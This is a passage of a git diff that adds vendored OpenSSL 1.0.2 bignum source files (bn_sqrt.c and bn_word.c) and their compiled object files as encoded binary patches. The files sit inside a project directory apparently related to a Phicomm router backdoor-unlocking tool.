zwQW_ChAo0fch4?cJr<9W5PFDg3q?A%h1$bgJ0U}aY&3q&_u^!jKY{l*wof?j;&_JR
z_*c-@KhJTI<Gb;}hlcOiY0z!`PdPrF<2N{7!SRXKeM3JyUs!@m9OvU)&vAa=9**<+
zPU{tf`@X=%GnL~rI6k)oU(a#8$95jtIsPKYdpSOp;~#Sz-#xaUvmEF1bDrb8|N9)D
z$oa`}oY(ha0-)hA6S}?cn;f6T@d(FfbNn96vEeeG=lNXS`TQ*9IG=|abOH^_W|hv6
zJB;5kZoeO&6ma|fMLfw}U23=uMm1rM9ri2{>kNC;*iMyrqG2^mJZ;G&@xU|O6^jFl
zcdIcE{D)X%JXV&xC9ZjT65Tzqgu07(3=gr6P<tZW6|*Ave?twJV@e9Ybj`r9?XmK1
zN~W$o#}R9RD$UUOHjI}5+6gO}_`Sn@>@OtVHEgd!M{ZpcL`FMVu&>Rn^4TJJ4QA-`
zzuMP>E&8m3&NqAig*=40y}vy!<ruH}>pzTt1sLJK3I5KZp8?Ch1_iF!`Lj_QOfZ&0
zdjbEDLTk1IHO0~VTO!#ElVbHdhA(Mo)Eo%b5BIkBx9eAIZ#1FSg*t2nhTj6b5{352
f3Tp?53|NY;g7^zWg3oX<`(Z2oPISh#Li@h~RMCe}

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_sqrt.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_sqrt.c
new file mode 100644
index 0000000..232af99
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_sqrt.c
@@ -0,0 +1,409 @@
+/* crypto/bn/bn_sqrt.c */
+/*
+ * Written by Lenka Fibikova <fibikova@exp-math.uni-essen.de> and Bodo
+ * Moeller for the OpenSSL project.
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "cryptlib.h"
+#include "bn_lcl.h"
+
+BIGNUM *BN_mod_sqrt(BIGNUM *in, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx)
+/*
+ * Returns 'ret' such that ret^2 == a (mod p), using the Tonelli/Shanks
+ * algorithm (cf. Henri Cohen, "A Course in Algebraic Computational Number
+ * Theory", algorithm 1.5.1). 'p' must be prime!
+ */
+{
+    BIGNUM *ret = in;
+    int err = 1;
+    int r;
+    BIGNUM *A, *b, *q, *t, *x, *y;
+    int e, i, j;
+
+    if (!BN_is_odd(p) || BN_abs_is_word(p, 1)) {
+        if (BN_abs_is_word(p, 2)) {
+            if (ret == NULL)
+                ret = BN_new();
+            if (ret == NULL)
+                goto end;
+            if (!BN_set_word(ret, BN_is_bit_set(a, 0))) {
+                if (ret != in)
+                    BN_free(ret);
+                return NULL;
+            }
+            bn_check_top(ret);
+            return ret;
+        }
+
+        BNerr(BN_F_BN_MOD_SQRT, BN_R_P_IS_NOT_PRIME);
+        return (NULL);
+    }
+
+    if (BN_is_zero(a) || BN_is_one(a)) {
+        if (ret == NULL)
+            ret = BN_new();
+        if (ret == NULL)
+            goto end;
+        if (!BN_set_word(ret, BN_is_one(a))) {
+            if (ret != in)
+                BN_free(ret);
+            return NULL;
+        }
+        bn_check_top(ret);
+        return ret;
+    }
+
+    BN_CTX_start(ctx);
+    A = BN_CTX_get(ctx);
+    b = BN_CTX_get(ctx);
+    q = BN_CTX_get(ctx);
+    t = BN_CTX_get(ctx);
+    x = BN_CTX_get(ctx);
+    y = BN_CTX_get(ctx);
+    if (y == NULL)
+        goto end;
+
+    if (ret == NULL)
+        ret = BN_new();
+    if (ret == NULL)
+        goto end;
+
+    /* A = a mod p */
+    if (!BN_nnmod(A, a, p, ctx))
+        goto end;
+
+    /* now write  |p| - 1  as  2^e*q  where  q  is odd */
+    e = 1;
+    while (!BN_is_bit_set(p, e))
+        e++;
+    /* we'll set  q  later (if needed) */
+
+    if (e == 1) {
+        /*-
+         * The easy case:  (|p|-1)/2  is odd, so 2 has an inverse
+         * modulo  (|p|-1)/2,  and square roots can be computed
+         * directly by modular exponentiation.
+         * We have
+         *     2 * (|p|+1)/4 == 1   (mod (|p|-1)/2),
+         * so we can use exponent  (|p|+1)/4,  i.e.  (|p|-3)/4 + 1.
+         */
+        if (!BN_rshift(q, p, 2))
+            goto end;
+        q->neg = 0;
+        if (!BN_add_word(q, 1))
+            goto end;
+        if (!BN_mod_exp(ret, A, q, p, ctx))
+            goto end;
+        err = 0;
+        goto vrfy;
+    }
+
+    if (e == 2) {
+        /*-
+         * |p| == 5  (mod 8)
+         *
+         * In this case  2  is always a non-square since
+         * Legendre(2,p) = (-1)^((p^2-1)/8)  for any odd prime.
+         * So if  a  really is a square, then  2*a  is a non-square.
+         * Thus for
+         *      b := (2*a)^((|p|-5)/8),
+         *      i := (2*a)*b^2
+         * we have
+         *     i^2 = (2*a)^((1 + (|p|-5)/4)*2)
+         *         = (2*a)^((p-1)/2)
+         *         = -1;
+         * so if we set
+         *      x := a*b*(i-1),
+         * then
+         *     x^2 = a^2 * b^2 * (i^2 - 2*i + 1)
+         *         = a^2 * b^2 * (-2*i)
+         *         = a*(-i)*(2*a*b^2)
+         *         = a*(-i)*i
+         *         = a.
+         *
+         * (This is due to A.O.L. Atkin,
+         * <URL: http://listserv.nodak.edu/scripts/wa.exe?A2=ind9211&L=nmbrthry&O=T&P=562>,
+         * November 1992.)
+         */
+
+        /* t := 2*a */
+        if (!BN_mod_lshift1_quick(t, A, p))
+            goto end;
+
+        /* b := (2*a)^((|p|-5)/8) */
+        if (!BN_rshift(q, p, 3))
+            goto end;
+        q->neg = 0;
+        if (!BN_mod_exp(b, t, q, p, ctx))
+            goto end;
+
+        /* y := b^2 */
+        if (!BN_mod_sqr(y, b, p, ctx))
+            goto end;
+
+        /* t := (2*a)*b^2 - 1 */
+        if (!BN_mod_mul(t, t, y, p, ctx))
+            goto end;
+        if (!BN_sub_word(t, 1))
+            goto end;
+
+        /* x = a*b*t */
+        if (!BN_mod_mul(x, A, b, p, ctx))
+            goto end;
+        if (!BN_mod_mul(x, x, t, p, ctx))
+            goto end;
+
+        if (!BN_copy(ret, x))
+            goto end;
+        err = 0;
+        goto vrfy;
+    }
+
+    /*
+     * e > 2, so we really have to use the Tonelli/Shanks algorithm. First,
+     * find some y that is not a square.
+     */
+    if (!BN_copy(q, p))
+        goto end;               /* use 'q' as temp */
+    q->neg = 0;
+    i = 2;
+    do {
+        /*
+         * For efficiency, try small numbers first; if this fails, try random
+         * numbers.
+         */
+        if (i < 22) {
+            if (!BN_set_word(y, i))
+                goto end;
+        } else {
+            if (!BN_pseudo_rand(y, BN_num_bits(p), 0, 0))
+                goto end;
+            if (BN_ucmp(y, p) >= 0) {
+                if (!(p->neg ? BN_add : BN_sub) (y, y, p))
+                    goto end;
+            }
+            /* now 0 <= y < |p| */
+            if (BN_is_zero(y))
+                if (!BN_set_word(y, i))
+                    goto end;
+        }
+
+        r = BN_kronecker(y, q, ctx); /* here 'q' is |p| */
+        if (r < -1)
+            goto end;
+        if (r == 0) {
+            /* m divides p */
+            BNerr(BN_F_BN_MOD_SQRT, BN_R_P_IS_NOT_PRIME);
+            goto end;
+        }
+    }
+    while (r == 1 && ++i < 82);
+
+    if (r != -1) {
+        /*
+         * Many rounds and still no non-square -- this is more likely a bug
+         * than just bad luck. Even if p is not prime, we should have found
+         * some y such that r == -1.
+         */
+        BNerr(BN_F_BN_MOD_SQRT, BN_R_TOO_MANY_ITERATIONS);
+        goto end;
+    }
+
+    /* Here's our actual 'q': */
+    if (!BN_rshift(q, q, e))
+        goto end;
+
+    /*
+     * Now that we have some non-square, we can find an element of order 2^e
+     * by computing its q'th power.
+     */
+    if (!BN_mod_exp(y, y, q, p, ctx))
+        goto end;
+    if (BN_is_one(y)) {
+        BNerr(BN_F_BN_MOD_SQRT, BN_R_P_IS_NOT_PRIME);
+        goto end;
+    }
+
+    /*-
+     * Now we know that (if  p  is indeed prime) there is an integer
+     * k,  0 <= k < 2^e,  such that
+     *
+     *      a^q * y^k == 1   (mod p).
+     *
+     * As  a^q  is a square and  y  is not,  k  must be even.
+     * q+1  is even, too, so there is an element
+     *
+     *     X := a^((q+1)/2) * y^(k/2),
+     *
+     * and it satisfies
+     *
+     *     X^2 = a^q * a     * y^k
+     *         = a,
+     *
+     * so it is the square root that we are looking for.
+     */
+
+    /* t := (q-1)/2  (note that  q  is odd) */
+    if (!BN_rshift1(t, q))
+        goto end;
+
+    /* x := a^((q-1)/2) */
+    if (BN_is_zero(t)) {        /* special case: p = 2^e + 1 */
+        if (!BN_nnmod(t, A, p, ctx))
+            goto end;
+        if (BN_is_zero(t)) {
+            /* special case: a == 0  (mod p) */
+            BN_zero(ret);
+            err = 0;
+            goto end;
+        } else if (!BN_one(x))
+            goto end;
+    } else {
+        if (!BN_mod_exp(x, A, t, p, ctx))
+            goto end;
+        if (BN_is_zero(x)) {
+            /* special case: a == 0  (mod p) */
+            BN_zero(ret);
+            err = 0;
+            goto end;
+        }
+    }
+
+    /* b := a*x^2  (= a^q) */
+    if (!BN_mod_sqr(b, x, p, ctx))
+        goto end;
+    if (!BN_mod_mul(b, b, A, p, ctx))
+        goto end;
+
+    /* x := a*x    (= a^((q+1)/2)) */
+    if (!BN_mod_mul(x, x, A, p, ctx))
+        goto end;
+
+    while (1) {
+        /*-
+         * Now  b  is  a^q * y^k  for some even  k  (0 <= k < 2^E
+         * where  E  refers to the original value of  e,  which we
+         * don't keep in a variable),  and  x  is  a^((q+1)/2) * y^(k/2).
+         *
+         * We have  a*b = x^2,
+         *    y^2^(e-1) = -1,
+         *    b^2^(e-1) = 1.
+         */
+
+        if (BN_is_one(b)) {
+            if (!BN_copy(ret, x))
+                goto end;
+            err = 0;
+            goto vrfy;
+        }
+
+        /* find smallest  i  such that  b^(2^i) = 1 */
+        i = 1;
+        if (!BN_mod_sqr(t, b, p, ctx))
+            goto end;
+        while (!BN_is_one(t)) {
+            i++;
+            if (i == e) {
+                BNerr(BN_F_BN_MOD_SQRT, BN_R_NOT_A_SQUARE);
+                goto end;
+            }
+            if (!BN_mod_mul(t, t, t, p, ctx))
+                goto end;
+        }
+
+        /* t := y^2^(e - i - 1) */
+        if (!BN_copy(t, y))
+            goto end;
+        for (j = e - i - 1; j > 0; j--) {
+            if (!BN_mod_sqr(t, t, p, ctx))
+                goto end;
+        }
+        if (!BN_mod_mul(y, t, t, p, ctx))
+            goto end;
+        if (!BN_mod_mul(x, x, t, p, ctx))
+            goto end;
+        if (!BN_mod_mul(b, b, y, p, ctx))
+            goto end;
+        e = i;
+    }
+
+ vrfy:
+    if (!err) {
+        /*
+         * verify the result -- the input might have been not a square (test
+         * added in 0.9.8)
+         */
+
+        if (!BN_mod_sqr(x, ret, p, ctx))
+            err = 1;
+
+        if (!err && 0 != BN_cmp(x, A)) {
+            BNerr(BN_F_BN_MOD_SQRT, BN_R_NOT_A_SQUARE);
+            err = 1;
+        }
+    }
+
+ end:
+    if (err) {
+        if (ret != NULL && ret != in) {
+            BN_clear_free(ret);
+        }
+        ret = NULL;
+    }
+    BN_CTX_end(ctx);
+    bn_check_top(ret);
+    return ret;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_sqrt.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_sqrt.o
new file mode 100644
index 0000000000000000000000000000000000000000..b91ba7f92d7cd3b9d59c555da28bda10234a3ff1
GIT binary patch
literal 5688
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
MrXT;55R~Zu8z*T}hyVZp

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_word.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_word.c
new file mode 100644
index 0000000..b031a60
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_word.c
@@ -0,0 +1,227 @@
+/* crypto/bn/bn_word.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include "bn_lcl.h"
+
+BN_ULONG BN_mod_word(const BIGNUM *a, BN_ULONG w)
+{
+#ifndef BN_LLONG
+    BN_ULONG ret = 0;
+#else
+    BN_ULLONG ret = 0;
+#endif
+    int i;
+
+    if (w == 0)
+        return (BN_ULONG)-1;
+
+    bn_check_top(a);
+    w &= BN_MASK2;
+    for (i = a->top - 1; i >= 0; i--) {
+#ifndef BN_LLONG
+        ret = ((ret << BN_BITS4) | ((a->d[i] >> BN_BITS4) & BN_MASK2l)) % w;
+        ret = ((ret << BN_BITS4) | (a->d[i] & BN_MASK2l)) % w;
+#else
+        ret = (BN_ULLONG) (((ret << (BN_ULLONG) BN_BITS2) | a->d[i]) %
+                           (BN_ULLONG) w);
+#endif
+    }
+    return ((BN_ULONG)ret);
+}
+
+BN_ULONG BN_div_word(BIGNUM *a, BN_ULONG w)
+{
+    BN_ULONG ret = 0;
+    int i, j;
+
+    bn_check_top(a);
+    w &= BN_MASK2;
+
+    if (!w)
+        /* actually this an error (division by zero) */
+        return (BN_ULONG)-1;
+    if (a->top == 0)
+        return 0;
+
+    /* normalize input (so bn_div_words doesn't complain) */
+    j = BN_BITS2 - BN_num_bits_word(w);
+    w <<= j;
+    if (!BN_lshift(a, a, j))
+        return (BN_ULONG)-1;
+
+    for (i = a->top - 1; i >= 0; i--) {
+        BN_ULONG l, d;
+
+        l = a->d[i];
+        d = bn_div_words(ret, l, w);
+        ret = (l - ((d * w) & BN_MASK2)) & BN_MASK2;
+        a->d[i] = d;
+    }
+    if ((a->top > 0) && (a->d[a->top - 1] == 0))
+        a->top--;
+    ret >>= j;
+    bn_check_top(a);
+    return (ret);
+}
+
+int BN_add_word(BIGNUM *a, BN_ULONG w)
+{
+    BN_ULONG l;
+    int i;
+
+    bn_check_top(a);
+    w &= BN_MASK2;
+
+    /* degenerate case: w is zero */
+    if (!w)
+        return 1;
+    /* degenerate case: a is zero */
+    if (BN_is_zero(a))
+        return BN_set_word(a, w);
+    /* handle 'a' when negative */
+    if (a->neg) {
+        a->neg = 0;
+        i = BN_sub_word(a, w);
+        if (!BN_is_zero(a))
+            a->neg = !(a->neg);
+        return (i);
+    }
+    for (i = 0; w != 0 && i < a->top; i++) {
+        a->d[i] = l = (a->d[i] + w) & BN_MASK2;
+        w = (w > l) ? 1 : 0;
+    }
+    if (w && i == a->top) {
+        if (bn_wexpand(a, a->top + 1) == NULL)
+            return 0;
+        a->top++;
+        a->d[i] = w;
+    }
+    bn_check_top(a);
+    return (1);
+}
+
+int BN_sub_word(BIGNUM *a, BN_ULONG w)
+{
+    int i;
+
+    bn_check_top(a);
+    w &= BN_MASK2;
+
+    /* degenerate case: w is zero */
+    if (!w)
+        return 1;
+    /* degenerate case: a is zero */
+    if (BN_is_zero(a)) {
+        i = BN_set_word(a, w);
+        if (i != 0)
+            BN_set_negative(a, 1);
+        return i;
+    }
+    /* handle 'a' when negative */
+    if (a->neg) {
+        a->neg = 0;
+        i = BN_add_word(a, w);
+        a->neg = 1;
+        return (i);
+    }
+
+    if ((a->top == 1) && (a->d[0] < w)) {
+        a->d[0] = w - a->d[0];
+        a->neg = 1;
+        return (1);
+    }
+    i = 0;
+    for (;;) {
+        if (a->d[i] >= w) {
+            a->d[i] -= w;
+            break;
+        } else {
+            a->d[i] = (a->d[i] - w) & BN_MASK2;
+            i++;
+            w = 1;
+        }
+    }
+    if ((a->d[i] == 0) && (i == (a->top - 1)))
+        a->top--;
+    bn_check_top(a);
+    return (1);
+}
+
+int BN_mul_word(BIGNUM *a, BN_ULONG w)
+{
+    BN_ULONG ll;
+
+    bn_check_top(a);
+    w &= BN_MASK2;
+    if (a->top) {
+        if (w == 0)
+            BN_zero(a);
+        else {
+            ll = bn_mul_words(a->d, a->d, a->top, w);
+            if (ll) {
+                if (bn_wexpand(a, a->top + 1) == NULL)
+                    return (0);
+                a->d[a->top++] = ll;
+            }
+        }
+    }
+    bn_check_top(a);
+    return (1);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_word.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_word.o
new file mode 100644
index 0000000000000000000000000000000000000000..444593326cc33657b6aa88ada16dcef95af4c800
GIT binary patch
literal 3264
zcmbuCe{2&~9Kc`Ojdf72Cx}cSrXVp}l-eQ*bQ;-p?e<EJO=Oh_j;8Aho37om-r*qp
zO1hF<jsY=h_)`;ONF?!JNWipA7!biZOduvIf1nu@A}AR|W#{*MeYf4tE-~?&ynF9`
z-uKu0zSp<xKv-<D+ib)T8+n~f&kRb)!RqO8gFb8^^NEZ6;ePH<n!T*i+=R42ZFc&{
zhNvbc3X#H1NAA+VTB=rQms(U8p~`3^JMN@~n;ucQObd5Bw0hJ(MjuVUN(jl#DN;NS
zY*=@ln{W@Ffq23ee_nV?hzf1d%~bhoQ}%$9xCcLm6{<XnC=<e2%xWAOfS;)Hvru<F
zq}&cEcOut*)p0H_&!O3iTCr1Ybo#ZSE=cp2Na2<vcW=N;Rfnkju3c$SUxV}}bprsR
zqEYvkqqOciRTpkhDpo|Ycb&zn;2@XZzmTf)XkwIR_kQ=7$d%efrO`>1#}JiX8{fLE
zU3f=m7q$zrVT?Mxo8ypTlqyeX_AU<vgS0#>KWWcbSbD1bri50ybg06hm{42!+$D({
zY36Z%`a<y;sxHnxw#h4~T2BL$yOz+pNvf<K3G?Wq__9`@*>g_ap{UwLWrWr}qDp-v
zaKHZ+&1rJAb}>+p9m+=MDLrWRYrcJ0AL^-=DlNPL=jt9D1dr+#*xZwd@-R0hyWTGC
z?lz_qQhRxSKAgKJh0O_O_c@86oR<>*e0CpC+#lwZFkg&PbtCa>bjVc@9m^ZsAB>2~
za;oKpGkOv^O<GD5Hv;DlTo3#p^MQ63Ryj<xuv1i4-Vn~}d*g>PHYk!_2MYE3acf8!
zFJ+|X4yoqGr0rPb&6}w50QMkP`zK0uTSe9Nl$|hDhQVH1qRP%!W!JuEX(H^TYLpC7
z8`Om=%g*TqDY~@_=6E;Ya9OEHb7Nz@r#9LlrzP1F@V?^pt@5vx^{IdVYM<A)rmlps
zR3H`5@DwYdHMc~Gosc{-2Q-wYOC7Q8d6U=%c-vA}mGc<v8f})bwQZ~yq4%-zRqR_i
z{-`~~)f{mIInPi<kgGjhDR90+a|CW(wkpIm*gxgg0T8%aPzZ80L5>e{PGR`MH&?EH
zOFZD>AT*RO@YBNahwROq$9{z41<<<ymlN=3xCVm1OVY&gLw0a=*dcJ9LlxjUTN&hh
zTjp}L00bjOc%FTbs|}e5A+=zBAANxI;zz`Ikbf3^*`r*IP>MSYfoBoC5EbNsR&Lo*
z_9eqw8`Yj^<<L)OCc~M7%=tIedDSf3ISa>ApDFWTy1<mDakh&YH|F~J0(%}B-UX`!
z0F>h!X5nqK@HlYHrw$7XqTd7PQ_#x!-#rUgfTN%9nIHYG0Q+bb{ZE+wG5A5C==TBo
